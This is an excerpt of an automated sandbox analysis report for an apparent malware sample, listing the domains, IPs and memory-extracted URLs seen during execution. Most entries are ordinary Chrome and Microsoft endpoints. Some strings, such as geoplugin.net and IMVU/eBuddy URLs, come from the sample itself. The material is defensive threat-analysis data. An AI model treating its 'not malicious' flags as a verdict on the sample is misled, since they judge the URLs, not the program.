                      http://tls-tunnel-check.googlezip.net/connect20%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      svc.ms-acdc-teams.office.com
                      		52.123.243.81
                      		truefalse
                        		high
                        chrome.cloudflare-dns.com
                        		172.64.41.3
                        		truefalse
                          		high
                          geoplugin.net
                          		178.237.33.50
                          		truefalse
                            		high
                            ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                            		94.245.104.56
                            		truefalse
                              		high
                              googlehosted.l.googleusercontent.com
                              		142.250.185.129
                              		truefalse
                                		high
                                clients2.googleusercontent.com
                                		unknown
                                		unknownfalse
                                  		high
                                  bzib.nelreports.net
                                  		unknown
                                  		unknownfalse
                                    		high
                                    ntp.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.b4742062efdd1e38bfac.jsfalse
                                        		high
                                        https://assets.msn.com/bundles/v1/edgeChromium/latest/common.2ab67b7067792da4ff61.jsfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabchrome.exe, 00000003.00000003.2227862312.00006B3C00D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/coacbEchrome.exe, 00000003.00000003.2232021563.00006B3C01380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.imvu.comr17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4572439462.0000000002860000.00000040.10000000.00040000.00000000.sdmpfalse
                                                		high
                                                https://google-ohttp-relay-join.fastly-edge.com/1chrome.exe, 00000003.00000003.2170470191.00004C380154C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2170584676.00004C3801550000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://google-ohttp-relay-join.fastly-edge.com/0chrome.exe, 00000003.00000003.2170671539.00004C3801560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://google-ohttp-relay-join.fastly-edge.com/l(chrome.exe, 00000003.00000003.2242455265.00006B3C02130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://anglebug.com/4633chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://google-ohttp-relay-join.fastly-edge.com/5chrome.exe, 00000003.00000003.2170470191.00004C380154C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2170584676.00004C3801550000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://anglebug.com/7382chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://issuetracker.google.com/284462263chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://google-ohttp-relay-join.fastly-edge.com/9chrome.exe, 00000003.00000003.2242455265.00006B3C02130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://google-ohttp-relay-join.fastly-edge.com/?chrome.exe, 00000003.00000003.2242455265.00006B3C02130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 00000003.00000003.2197208210.00006B3C00770000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://google-ohttp-relay-join.fastly-edge.com/;#chrome.exe, 00000003.00000003.2242455265.00006B3C02130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://google-ohttp-relay-join.fastly-edge.com/Bchrome.exe, 00000003.00000003.2244445247.00006B3C022D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244558634.00006B3C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244591281.00006B3C022E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244520622.00006B3C022D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244408627.00006B3C022CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://docs.google.com/chrome.exe, 00000003.00000003.2195846285.00006B3C00438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://anglebug.com/7714chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://anglebug.com/6248chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://google-ohttp-relay-join.fastly-edge.com/J=chrome.exe, 00000003.00000003.2244445247.00006B3C022D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244558634.00006B3C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244591281.00006B3C022E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2245187884.00006B3C022E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244520622.00006B3C022D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244408627.00006B3C022CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://anglebug.com/6929chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://anglebug.com/5281chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://google-ohttp-relay-join.fastly-edge.com/bchrome.exe, 00000003.00000003.2244445247.00006B3C022D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244558634.00006B3C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244591281.00006B3C022E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244520622.00006B3C022D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244408627.00006B3C022CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://google-ohttp-relay-join.fastly-edge.com/:&chrome.exe, 00000003.00000003.2242455265.00006B3C02130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://issuetracker.google.com/255411748chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000003.00000003.2197208210.00006B3C00770000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://anglebug.com/7246chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://anglebug.com/7369chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://anglebug.com/7489chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://duckduckgo.com/?q=chrome.exe, 00000003.00000003.2227862312.00006B3C00D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://chrome.google.com/webstorechrome.exe, 00000003.00000003.2206162041.00006B3C00E30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://drive-daily-2.corp.google.com/chrome.exe, 00000003.00000003.2195846285.00006B3C00438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.google.com/chromesuggestionsJKchrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.imvu.com17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exefalse
                                                                                                                		high
                                                                                                                https://support.google.com/chrome/?p=blockedbchrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/-#chrome.exe, 00000003.00000003.2242455265.00006B3C02130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://issuetracker.google.com/161903006chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://tls-tunnel-check.googlezip.net/connect2chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://drive-daily-1.corp.google.com/chrome.exe, 00000003.00000003.2195846285.00006B3C00438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/n9chrome.exe, 00000003.00000003.2244445247.00006B3C022D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244558634.00006B3C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244591281.00006B3C022E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244520622.00006B3C022D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244408627.00006B3C022CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://drive-daily-5.corp.google.com/chrome.exe, 00000003.00000003.2195846285.00006B3C00438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://duckduckgo.com/favicon.icochrome.exe, 00000003.00000003.2227862312.00006B3C00D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/L-chrome.exe, 00000003.00000003.2242455265.00006B3C02130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://anglebug.com/3078chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://anglebug.com/7553chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://anglebug.com/5375chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://anglebug.com/5371chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://geoplugin.net/17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2145694098.0000000000838000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2146564950.0000000000838000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2144560782.0000000000838000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2139350448.0000000000838000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2138314383.0000000000836000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2145241293.0000000000838000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2139177976.0000000000836000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://anglebug.com/4722chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://anglebug.com/7556chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://chromewebstore.google.com/17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2416400031.00000000007FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://google-ohttp-relay-join.fastly-edge.com/m=chrome.exe, 00000003.00000003.2244445247.00006B3C022D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244558634.00006B3C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244591281.00006B3C022E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2245187884.00006B3C022E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244520622.00006B3C022D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244408627.00006B3C022CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.google.com/accounts/servicelogin17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exefalse
                                                                                                                                                    		high
                                                                                                                                                    https://drive-preprod.corp.google.com/chrome.exe, 00000003.00000003.2195846285.00006B3C00438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://chrome.google.com/webstore/17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2416400031.00000000007FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.google.com/bchrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/~-chrome.exe, 00000003.00000003.2242455265.00006B3C02130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/&&chrome.exe, 00000003.00000003.2242455265.00006B3C02130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://anglebug.com/6692chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://issuetracker.google.com/258207403chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://google-ohttp-relay-join.fastly-edge.com/G-chrome.exe, 00000003.00000003.2242455265.00006B3C02130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/W=chrome.exe, 00000003.00000003.2244445247.00006B3C022D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244558634.00006B3C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244591281.00006B3C022E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2245187884.00006B3C022E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244520622.00006B3C022D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244408627.00006B3C022CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://anglebug.com/3502chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://anglebug.com/3623chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://anglebug.com/3625chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://anglebug.com/3624chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://anglebug.com/5007chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://anglebug.com/3862chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000003.00000003.2229943296.00006B3C00F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203615554.00006B3C00F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2205187092.00006B3C00F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2206162041.00006B3C00E30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/h9chrome.exe, 00000003.00000003.2244445247.00006B3C022D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244558634.00006B3C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244591281.00006B3C022E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244520622.00006B3C022D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244408627.00006B3C022CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://anglebug.com/4836chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://issuetracker.google.com/issues/166475273chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/G=chrome.exe, 00000003.00000003.2244445247.00006B3C022D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244558634.00006B3C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244591281.00006B3C022E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2245187884.00006B3C022E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244520622.00006B3C022D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244408627.00006B3C022CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://google-ohttp-relay-safebrowsing.fastly-edge.com/https://google-ohttp-relay-safebrowsing.fastchrome.exe, 00000003.00000003.2173573249.00004C3801720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2173492934.00004C380171C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://ch.search.yahoo.com/favicon.icochrome.exe, 00000003.00000003.2227862312.00006B3C00D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4572439462.0000000002860000.00000040.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://anglebug.com/4384chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/F(chrome.exe, 00000003.00000003.2242455265.00006B3C02130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://anglebug.com/3970chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/Echrome.exe, 00000003.00000003.2170671539.00004C3801560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/vichrome.exe, 00000003.00000003.2171967940.00004C3801624000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://nonexistent.googlezip.net/chrome.exe, 00000003.00000003.2148395604.00004C38012F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://anglebug.com/7604chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://anglebug.com/7761chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://anglebug.com/7760chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://anglebug.com/5901chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
